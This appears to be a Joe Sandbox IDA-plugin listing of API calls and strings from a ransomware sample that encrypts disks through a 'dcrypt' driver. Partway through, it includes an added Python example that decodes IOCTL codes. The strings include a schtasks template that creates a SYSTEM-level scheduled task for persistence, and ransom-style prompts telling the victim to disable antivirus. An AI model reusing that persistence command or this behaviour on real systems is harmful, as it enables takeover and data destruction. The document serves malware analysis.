                                              • GetOEMCP.KERNEL32 ref: 00A84AA3
                                              • GetCursorInfo.USER32(?), ref: 00A84ACE
                                              • GetCaretPos.USER32(?), ref: 00A84ADB
                                              • GetCurrentThread.KERNEL32 ref: 00A84AFD
                                              • GetThreadTimes.KERNEL32(00000000), ref: 00A84B04
                                              • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00A84B23
                                              • GetProcessTimes.KERNEL32(00000000), ref: 00A84B26
                                              • GetCurrentProcess.KERNEL32(00000028,00000028), ref: 00A84B32
                                              • GetProcessMemoryInfo.PSAPI(00000000), ref: 00A84B35
                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00A84B3F
                                              • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00A84B49
                                              • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00A84BAD
                                                • Part of subcall function 00A83D00: TlsGetValue.KERNEL32(?), ref: 00A83D19
                                                • Part of subcall function 00A83D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A83D31
                                                • Part of subcall function 00A83D00: TlsSetValue.KERNEL32(?,00000000), ref: 00A83D46
                                                • Part of subcall function 00A83D00: DeviceIoControl.KERNEL32(00000000,00220020,01490000,00000000,00000000,00000000,?,00000000), ref: 00A83D5E
                                                • Part of subcall function 00A83D00: GetLastError.KERNEL32 ref: 00A83D68
                                              Strings
                                              Similarity
                                              • API ID: Process$CurrentWindow$Thread$ActiveClipboardCursorInfoLastMemoryStatusTimesValue$CaptureCaretCodeControlCountCounterCreateDesktopDeviceEnumErrorFileFocusForegroundGlobalHeapInputMessageOpenOwnerPagePerformancePopupQueryQueueShellStateTickTimeWindows
                                              • String ID: ($@
                                              • API String ID: 3079641271-1311469180
                                              APIs
                                              • _wprintf.LIBCMT ref: 00A8456B
                                                • Part of subcall function 00A861C0: __lock.LIBCMT ref: 00A861CE
                                                • Part of subcall function 00A861C0: __getch_nolock.LIBCMT ref: 00A861D8
                                              • GetLogicalDrives.KERNEL32 ref: 00A84578
                                              • _memset.LIBCMT ref: 00A845D0
                                              • GetDriveTypeW.KERNEL32(?), ref: 00A845DF
                                              • PathAppendW.SHLWAPI(?,Readme.txt), ref: 00A845F2
                                                • Part of subcall function 00A84490: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844AA
                                                • Part of subcall function 00A84490: GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844BD
                                                • Part of subcall function 00A84490: GetProcessHeap.KERNEL32(00000000,00000001,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844D0
                                                • Part of subcall function 00A84490: HeapAlloc.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844D7
                                                • Part of subcall function 00A84490: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844F3
                                                • Part of subcall function 00A84490: GetProcessHeap.KERNEL32(00000000,00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A84504
                                                • Part of subcall function 00A84490: HeapFree.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A8450B
                                                • Part of subcall function 00A84490: CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A84513
                                              • _wprintf.LIBCMT ref: 00A84673
                                              • _wprintf.LIBCMT ref: 00A84680
                                              • _wscanf.LIBCMT ref: 00A846AC
                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A846BC
                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00A846D4
                                              • _wprintf.LIBCMT ref: 00A846F7
                                              • GetStdHandle.KERNEL32(000000F5), ref: 00A84706
                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?), ref: 00A84712
                                              • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,?,00000000,?), ref: 00A84735
                                              • SetConsoleCursorPosition.KERNEL32(00000000,00000000), ref: 00A8473D
                                              • _wprintf.LIBCMT ref: 00A8474E
                                              • _wprintf.LIBCMT ref: 00A8475B
                                              • _wscanf.LIBCMT ref: 00A84787
                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A84797
                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00A847AF
                                              • _wprintf.LIBCMT ref: 00A847C2
                                              Strings
                                              Similarity
                                              • API ID: _wprintf$Heap$ConsoleCreateFile$EventHandleObjectProcessSingleWait_wscanf$AllocAppendBufferCharacterCloseCursorDriveDrivesFillFreeInfoLogicalOutputPathPositionReadScreenSizeType__getch_nolock__lock_memset
                                              • String ID: Disable your anti-virus and anti-malware programs$Enter password#2: $Files decryption completed$:$Incorrect password$Readme.txt$Visit
                                              • API String ID: 2127848508-3595650393
                                              APIs
                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00A86674,00A95CD0,00000014), ref: 00A8A207
                                              • __mtterm.LIBCMT ref: 00A8A213
                                                • Part of subcall function 00A89F4C: RtlDecodePointer.NTDLL(00000005), ref: 00A89F5D
                                                • Part of subcall function 00A89F4C: TlsFree.KERNEL32(00000003,00A8A375,?,00A86674,00A95CD0,00000014), ref: 00A89F77
                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00A8A229
                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00A8A236
                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00A8A243
                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00A8A250
                                              • TlsAlloc.KERNEL32(?,00A86674,00A95CD0,00000014), ref: 00A8A2A0
                                              • TlsSetValue.KERNEL32(00000000,?,00A86674,00A95CD0,00000014), ref: 00A8A2BB
                                              • __init_pointers.LIBCMT ref: 00A8A2C5
                                              • RtlEncodePointer.NTDLL ref: 00A8A2D6
                                              • RtlEncodePointer.NTDLL ref: 00A8A2E3
                                              • RtlEncodePointer.NTDLL ref: 00A8A2F0
                                              • RtlEncodePointer.NTDLL ref: 00A8A2FD
                                              • RtlDecodePointer.NTDLL(00A8A0D0), ref: 00A8A31E
                                              • __calloc_crt.LIBCMT ref: 00A8A333
                                              • RtlDecodePointer.NTDLL(00000000), ref: 00A8A34D
                                              • __initptd.LIBCMT ref: 00A8A358
                                              • GetCurrentThreadId.KERNEL32 ref: 00A8A35F
                                              Strings
                                              Similarity
                                              • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                              • API String ID: 3732613303-3819984048
                                              APIs
                                              • GetLocalTime.KERNEL32(?), ref: 00A8592B
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A8593F
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A85979
                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00A8598B
                                              • PathAppendW.SHLWAPI(?,?), ref: 00A859F8
                                                • Part of subcall function 00A857B0: _vswprintf_s.LIBCMT ref: 00A857DB
                                                • Part of subcall function 00A85810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00A8585A
                                                • Part of subcall function 00A85810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00A85870
                                                • Part of subcall function 00A85810: lstrcatW.KERNEL32(?,\cmd.exe), ref: 00A85886
                                                • Part of subcall function 00A85810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00A858EE
                                              Strings
                                              Similarity
                                              • API ID: Time$System$DirectoryFile$AppendCreateEnvironmentLocalPathProcessVariable_vswprintf_slstrcat
                                              • String ID: $ $ $.$/$d$f$r$s$schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00$u$w$x
                                              • API String ID: 980647657-2418224214
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F5), ref: 00A84E24
                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?), ref: 00A84E31
                                              • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,?,00000000,?), ref: 00A84E58
                                              • SetConsoleCursorPosition.KERNEL32(00000000,00000000), ref: 00A84E60
                                              • _wprintf.LIBCMT ref: 00A84E6B
                                              • TlsGetValue.KERNEL32(?,0022003C,?,00000298,?,00000298,?,00000000), ref: 00A84ED8
                                              • DeviceIoControl.KERNEL32(00000000), ref: 00A84EDF
                                              • _wprintf.LIBCMT ref: 00A84F95
                                              • TlsGetValue.KERNEL32(?,00220038,?,00000298,?,00000298,?,00000000), ref: 00A84FD6
                                              • DeviceIoControl.KERNEL32(00000000), ref: 00A84FDD
                                              • _wprintf.LIBCMT ref: 00A85006
                                              • _wprintf.LIBCMT ref: 00A85013
                                              • _wprintf.LIBCMT ref: 00A8503A
                                              Strings
                                              Similarity
                                              • API ID: _wprintf$Console$ControlDeviceValue$BufferCharacterCursorFillHandleInfoOutputPositionScreen
                                              • String ID: Decryption error %d$Disk decryption completed$%-.3f %%$Disk decryption progress...
                                              • API String ID: 3598326828-3817340760
                                              • Opcode ID: 2cfb44f62b80b9cf3bc3d001f22fe6e5f6cea0d236c08ecbbd494d33bbd2cbe3
                                              • Instruction ID: e4b1e6326cab4ee17f2f92dcdb984a748ba9ce1e7cd8d0f6b1c669a1921f890b
                                              • Opcode Fuzzy Hash: 2cfb44f62b80b9cf3bc3d001f22fe6e5f6cea0d236c08ecbbd494d33bbd2cbe3
                                              • Instruction Fuzzy Hash: FC51D7B1E006199BDB24EF64DC45BFEB7B8FB48701F004599E509D2290EE705E85CF94
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00A85C0F
                                              • PathAppendW.SHLWAPI(?,?), ref: 00A85C78
                                                • Part of subcall function 00A85810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00A8585A
                                                • Part of subcall function 00A85810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00A85870
                                                • Part of subcall function 00A85810: lstrcatW.KERNEL32(?,\cmd.exe), ref: 00A85886
                                                • Part of subcall function 00A85810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00A858EE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: DirectorySystem$AppendCreateEnvironmentPathProcessVariablelstrcat
                                              • String ID: $ $ $.$/$d$f$r$s$u$w$x
                                              • API String ID: 1581931562-2588986813
                                              • Opcode ID: 67df9023eb540ebdb1b2469a4cf744f74e97ed5372a8f8cf198096ed3d2b712e
                                              • Instruction ID: 719b6c9d57b8296fc0efd18aa9c662f814133c6d19704188a81d98db98fa0bcc
                                              • Opcode Fuzzy Hash: 67df9023eb540ebdb1b2469a4cf744f74e97ed5372a8f8cf198096ed3d2b712e
                                              • Instruction Fuzzy Hash: EF1109B0D0130C9BDF00EFA1E8597EEBBB6FB04344F108159D9056A291DBB69A58CF94
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,00000298,00003000,00000040), ref: 00A8235D
                                              • TlsGetValue.KERNEL32(?), ref: 00A82370
                                              • CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A82388
                                              • TlsSetValue.KERNEL32(?,00000000), ref: 00A8239D
                                              • DeviceIoControl.KERNEL32(00000000,00220060,?,00000008,00000000,00000000,?,00000000), ref: 00A823B9
                                              • GetLastError.KERNEL32 ref: 00A823C3
                                              • VirtualLock.KERNEL32(?,00000298), ref: 00A823D6
                                              • TlsGetValue.KERNEL32(?,00220028,?,00000298,?,00000298,?,00000000), ref: 00A82440
                                              • DeviceIoControl.KERNEL32(00000000), ref: 00A82447
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Value$ControlDeviceVirtual$AllocCreateErrorFileLastLock
                                              • String ID: \\.\dcrypt
                                              • API String ID: 233298530-1945893055
                                              • Opcode ID: c29f6ba83f33a4f45b7822b771b3be130e316bcaba868f1163e44c12928d172f
                                              • Instruction ID: 1b4242b80c9b0838d4f95243f20a3a0746cd0207f5da4f3b14c2d3897d92499b
                                              • Opcode Fuzzy Hash: c29f6ba83f33a4f45b7822b771b3be130e316bcaba868f1163e44c12928d172f
                                              • Instruction Fuzzy Hash: 1E31AF76B40315BBEB20EBA4DC59FBB7778EB44711F044155FE09AB2D0DA749E0187A0
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,00000298,00003000,00000040), ref: 00A8248D
                                              • TlsGetValue.KERNEL32(?), ref: 00A824A0
                                              • CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A824B8
                                              • TlsSetValue.KERNEL32(?,00000000), ref: 00A824CD
                                              • DeviceIoControl.KERNEL32(00000000,00220060,?,00000008,00000000,00000000,?,00000000), ref: 00A824E9
                                              • GetLastError.KERNEL32 ref: 00A824F3
                                              • VirtualLock.KERNEL32(?,00000298), ref: 00A82506
                                              • TlsGetValue.KERNEL32(?,0022002C,?,00000298,?,00000298,?,00000000), ref: 00A8256B
                                              • DeviceIoControl.KERNEL32(00000000), ref: 00A82572
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Value$ControlDeviceVirtual$AllocCreateErrorFileLastLock
                                              • String ID: \\.\dcrypt
                                              • API String ID: 233298530-1945893055
                                              • Opcode ID: cccbbd754ab83c4339123412529d66a99ce370191bb5b7f177710f2dfbe408df
                                              • Instruction ID: 3b797eab15a81e8b2a4891979d016c2bed834089f48e8f0ea939730d93d44e08
                                              • Opcode Fuzzy Hash: cccbbd754ab83c4339123412529d66a99ce370191bb5b7f177710f2dfbe408df
                                              • Instruction Fuzzy Hash: 8931BE76B80315BBEB20DBA4AC59FBB777CEB45711F044115FE09AB2C0DA759E0187A0
                                              APIs
                                              • LocalAlloc.KERNEL32(00000040,000000F0), ref: 00A8135A
                                              • GetSystemDefaultLCID.KERNEL32 ref: 00A81375
                                              • GetTimeZoneInformation.KERNEL32(?), ref: 00A81385
                                              • _memmove.LIBCMT ref: 00A8139F
                                              • NetWkstaGetInfo.NETAPI32(00A94ED4,00000064,?), ref: 00A813BD
                                              • _memmove.LIBCMT ref: 00A81436
                                              • _memmove.LIBCMT ref: 00A81467
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00A814C4
                                              • _memmove.LIBCMT ref: 00A814EF
                                              • LocalFree.KERNEL32(00000000), ref: 00A8154F
                                              • LocalFree.KERNEL32(00000000), ref: 00A8156A
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Local_memmove$AllocFree$DefaultInfoInformationSystemTimeWkstaZone
                                              • String ID:
                                              • API String ID: 605661058-0
                                              • Opcode ID: 31fcd372ce86b5692d246ef517fdad73e559813449706c70e303af173699a381
                                              • Instruction ID: 7337f5f0663313995fb2fabd9724e4838d390b90fb2423482ccb85768ab4401e
                                              • Opcode Fuzzy Hash: 31fcd372ce86b5692d246ef517fdad73e559813449706c70e303af173699a381
                                              • Instruction Fuzzy Hash: 7C719371A002159BDB24EF68DC85FAAB7B9FF44710F0482AAE90D97251DB30DE46CB91
                                              APIs
                                              • _memset.LIBCMT ref: 00A835FA
                                              • CreateFileW.KERNEL32(\\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1),80100000,00000003,00000000,00000003,00000000,00000000,?,?,00A82DD3), ref: 00A83616
                                              • DeviceIoControl.KERNEL32(00000000,00070048,00000000,00000000,?,00000090,?,00000000), ref: 00A83666
                                              • DeviceIoControl.KERNEL32(00000000,002D1080,00000000,00000000,?,0000000C,?,00000000), ref: 00A836A3
                                              • CloseHandle.KERNEL32(00000000,?,?,00A82DD3), ref: 00A83802
                                              Strings
                                              • \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1), xrefs: 00A83611
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: ControlDevice$CloseCreateFileHandle_memset
                                              • String ID: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
                                              • API String ID: 2416907234-457416688
                                              • Opcode ID: acc19ce802b111fc01ce6805f29df70ae8dabba3f938886471ba7e0e7d18f804
                                              • Instruction ID: b190190dbe483552f241f7e5e2c95256e1c2c227d93123093876bd6d5870ba55
                                              • Opcode Fuzzy Hash: acc19ce802b111fc01ce6805f29df70ae8dabba3f938886471ba7e0e7d18f804
                                              • Instruction Fuzzy Hash: 546167B5A40714ABE730DF55DD41BAAF3F4EF48B10F108569F649A72C0D7B0AE848B94
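The DeviceIoControl references in the records above carry the raw control codes the plugin recovered (0x70048 and 0x2D1080 on the handle to the raw partition path, and a family of 0x2200xx codes on the handle to \\.\dcrypt). Splitting each code with the CTL_CODE field layout tells an analyst which device class and function the sample is driving before any driver symbols are available. The Python below is an added example for reading these listings, not part of the Joe Sandbox report or of the sample; the listing lines it parses are copied from the records on this page, the name table covers only the two standard Windows disk IOCTLs, and the 0x22 (FILE_DEVICE_UNKNOWN) codes sent to \\.\dcrypt are driver-private and are deliberately left unnamed rather than guessed.

```python
import re

# CTL_CODE(DeviceType, Function, Method, Access) packs four fields:
#   bits 31..16 DeviceType, bits 15..14 Access, bits 13..2 Function, bits 1..0 Method
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS",
          3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
DEVICE_TYPES = {0x07: "FILE_DEVICE_DISK", 0x22: "FILE_DEVICE_UNKNOWN", 0x2D: "FILE_DEVICE_MASS_STORAGE"}

# Standard Windows codes that appear in the listing. Codes with DeviceType 0x22 are
# private to whatever driver answers \\.\dcrypt and are intentionally not named here.
KNOWN_IOCTLS = {
    0x00070048: "IOCTL_DISK_GET_PARTITION_INFO_EX",
    0x002D1080: "IOCTL_STORAGE_GET_DEVICE_NUMBER",
}


def decode_ioctl(code: int) -> dict:
    """Split a DeviceIoControl control code into its CTL_CODE fields."""
    dev = (code >> 16) & 0xFFFF
    return {
        "code": code,
        "device_type": DEVICE_TYPES.get(dev, f"0x{dev:X}"),
        "access": ACCESS[(code >> 14) & 0x3],
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
        "name": KNOWN_IOCTLS.get(code),  # None for driver-private codes
    }


# Only calls where the plugin recovered the second argument (the control code) match;
# a line such as "DeviceIoControl.KERNEL32(00000000), ref: ..." carries no code and is skipped.
_IOCTL_RE = re.compile(
    r"DeviceIoControl\.KERNEL32\([0-9A-Fa-f?]+,([0-9A-Fa-f]{8})[,)].*?ref: ([0-9A-Fa-f]{8})"
)


def extract_ioctls(listing: str) -> list:
    """Return (control_code, call_site) pairs from Joe Sandbox 'APIs' lines."""
    return [(int(m.group(1), 16), int(m.group(2), 16)) for m in _IOCTL_RE.finditer(listing)]


# Lines copied verbatim from the function records on this page.
SAMPLE_LISTING = """
• DeviceIoControl.KERNEL32(00000000,00220060,?,00000008,00000000,00000000,?,00000000), ref: 00A823B9
• DeviceIoControl.KERNEL32(00000000,00070048,00000000,00000000,?,00000090,?,00000000), ref: 00A83666
• DeviceIoControl.KERNEL32(00000000,002D1080,00000000,00000000,?,0000000C,?,00000000), ref: 00A836A3
• DeviceIoControl.KERNEL32(00000000,00220064,?,00000004,00000000,00000000,?,00000000), ref: 00A83876
• DeviceIoControl.KERNEL32(00000000), ref: 00A84EDF
"""


def report(listing: str) -> list:
    """One human-readable row per recovered DeviceIoControl call."""
    rows = []
    for code, site in extract_ioctls(listing):
        d = decode_ioctl(code)
        rows.append(
            f"{site:08X}: 0x{code:06X} {d['device_type']} fn=0x{d['function']:X} "
            f"{d['method']} {d['access']} {d['name'] or '(driver-private)'}"
        )
    return rows


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_LISTING)))
```

Run against the four recoverable calls, the decoder separates the two standard disk queries (partition layout and storage device number, both FILE_ANY_ACCESS and METHOD_BUFFERED, which is why they succeed on a plain read handle) from the driver-private codes on \\.\dcrypt, whose DeviceType 0x22 marks them as belonging to a third-party driver rather than to the Windows disk stack. Any code the plugin could not recover (the single-argument "DeviceIoControl.KERNEL32(00000000)" entries) is skipped rather than guessed.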
                                              APIs
                                              • TlsGetValue.KERNEL32(?,00000001,?,?,?,?,00A82463,?), ref: 00A8382D
                                              • CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,00A82463,?), ref: 00A83845
                                              • TlsSetValue.KERNEL32(?,00000000,?,?,?,?,00A82463,?), ref: 00A8385A
                                              • DeviceIoControl.KERNEL32(00000000,00220064,?,00000004,00000000,00000000,?,00000000), ref: 00A83876
                                              • GetLastError.KERNEL32(?,?,?,?,00A82463,?), ref: 00A83880
                                              • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,00A82463,?), ref: 00A83894
                                              • VirtualUnlock.KERNEL32(?,?,?,?,?,?,00A82463,?), ref: 00A838C2
                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00A82463,?), ref: 00A838D3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Virtual$Value$ControlCreateDeviceErrorFileFreeLastQueryUnlock
                                              • String ID: \\.\dcrypt
                                              • API String ID: 78819294-1945893055
                                              • Opcode ID: 3d3a2e87af144dbccf29ec1b40eb0c2d520cff8250d845f490e15a06b4cd7d39
                                              • Instruction ID: 12c88bfb4d6508cade3046ac94f7a3f2c96dfd0b0876f81d7716ac8db6143928
                                              • Opcode Fuzzy Hash: 3d3a2e87af144dbccf29ec1b40eb0c2d520cff8250d845f490e15a06b4cd7d39
                                              • Instruction Fuzzy Hash: 57213E77A41215BBEF20EBA5DC49FBA3778EB04B51F104105F905EA190DB74AF068BA0
                                              APIs
                                              • GetLogicalDrives.KERNEL32 ref: 00A81F43
                                              • GetDriveTypeW.KERNEL32(?), ref: 00A81F88
                                              • LocalAlloc.KERNEL32(00000040,00000050), ref: 00A81F97
                                              • CreateThread.KERNEL32(00000000,00000000,Function_00001E40,00000000,00000000,00000000), ref: 00A81FDC
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00A81FE7
                                              • CloseHandle.KERNEL32(00000000), ref: 00A81FEE
                                              Strings
                                              • MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxX, xrefs: 00A81FB0
                                              • :, xrefs: 00A81F7D
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: AllocCloseCreateDriveDrivesHandleLocalLogicalObjectSingleThreadTypeWait
                                              • String ID: :$MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxX
                                              • API String ID: 3841114299-3934174110
                                              • Opcode ID: 5245906d20f47a1457c37ea77def020134132f83af2807c8e52995a655e2c6a6
                                              • Instruction ID: 9bc5a767425db74d26153f8bc74e8e9e7e1a703a2c9721cce7f7212946e5845a
                                              • Opcode Fuzzy Hash: 5245906d20f47a1457c37ea77def020134132f83af2807c8e52995a655e2c6a6
                                              • Instruction Fuzzy Hash: 53214A75A00209AFDF00EFA4DC45BAEB7B5FF49710F50816AE915AB391CB709A06CB94
                                              APIs
                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844AA
                                              • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844BD
                                              • GetProcessHeap.KERNEL32(00000000,00000001,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844D0
                                              • HeapAlloc.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844D7
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844F3
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A84504
                                              • HeapFree.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A8450B
                                              • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A84513
                                              • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A84535
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
